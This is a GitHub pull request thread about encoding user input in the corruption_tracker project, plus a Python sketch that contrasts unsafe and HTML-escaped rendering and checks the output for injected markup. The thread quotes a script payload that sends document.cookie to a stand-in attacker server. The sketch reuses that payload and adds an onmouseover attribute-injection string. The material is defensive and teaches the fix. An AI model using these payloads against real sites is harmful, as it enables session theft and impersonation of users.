autogestion / corruption_tracker

BSD 3-Clause "New" or "Revised" License

Encode user input #43

Closed Vegasq closed 9 years ago

Vegasq commented 9 years ago

A way to prevent a stupid bug :laughing:

screenshot
autogestion commented 9 years ago

So, there was a way for a user to insert a picture hosted somewhere into the claim text? Maybe it's not a bug, but a feature?)

Vegasq commented 9 years ago

Nope. There was a problem that a user could insert any HTML code on the page, and, e.g., using JS injection, a bad guy had the option to steal a cookie and create a claim as another user.

Like:

<script>
    // attacker-controlled claim text: ships the victim's cookies to the attacker's host
    // (jQuery is assumed to be already loaded on the page)
    $.ajax({'url': 'my/server?cookie=' + document.cookie})
</script>
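As an added illustration of the fix the issue title asks for (HTML-encoding claim text before it is written into the page), here is a small Python sketch. It is not code from corruption_tracker: the template, the two render functions and the sample payloads are assumptions made for this example, and it goes slightly beyond the thread by also covering an attribute-context payload. It renders the claim verbatim, as the thread describes the pre-fix behaviour, next to an encoded version, and then uses the standard library's HTML parser to check whether the user-supplied text turned into markup.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not taken from the project): the cookie-exfiltration
# snippet quoted in the issue, and a variant that breaks out of an attribute.
SCRIPT_PAYLOAD = "<script>$.ajax({'url': 'my/server?cookie=' + document.cookie})</script>"
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_claim_unsafe(text: str) -> str:
    """Pre-fix behaviour (assumed template): claim text is dropped into the page
    verbatim, both as element content and inside a quoted attribute."""
    return f'<div class="claim" title="{text}">{text}</div>'


def render_claim_escaped(text: str) -> str:
    """The fix: HTML-encode the text for the context it lands in.
    html.escape(quote=True) rewrites &, <, >, " and ', which is enough for
    element content and double-quoted attribute values (but not for a
    <script> block, a URL, or an unquoted attribute)."""
    safe = html.escape(text, quote=True)
    return f'<div class="claim" title="{safe}">{safe}</div>'


class _MarkupAudit(HTMLParser):
    """Records every start tag and every on* attribute the parser sees,
    i.e. what a browser would treat as structure rather than text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_handlers.extend(
            name for name, _ in attrs if name.lower().startswith("on")
        )


def injected_markup(rendered: str) -> tuple[list[str], list[str]]:
    """Parse rendered HTML and return (extra_tags, event_handlers): the tags
    beyond the single <div> the template itself emits, and any on* handlers.
    Both lists are empty when user text stayed inert."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    extra_tags = [t for t in audit.tags if t != "div"]
    return extra_tags, audit.event_handlers


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("unsafe :", injected_markup(render_claim_unsafe(payload)))
        print("escaped:", injected_markup(render_claim_escaped(payload)))
```

The unsafe renderer lets the first payload become a real `<script>` element and the second one become an `onmouseover` handler on the `<div>`; the encoded renderer leaves both as plain text. Note that encoding is context-specific: the same `html.escape` call would not make text safe inside an existing `<script>` block or a `href`. Marking the session cookie `HttpOnly` would stop the `document.cookie` read shown in the issue, but it does not remove the injection itself.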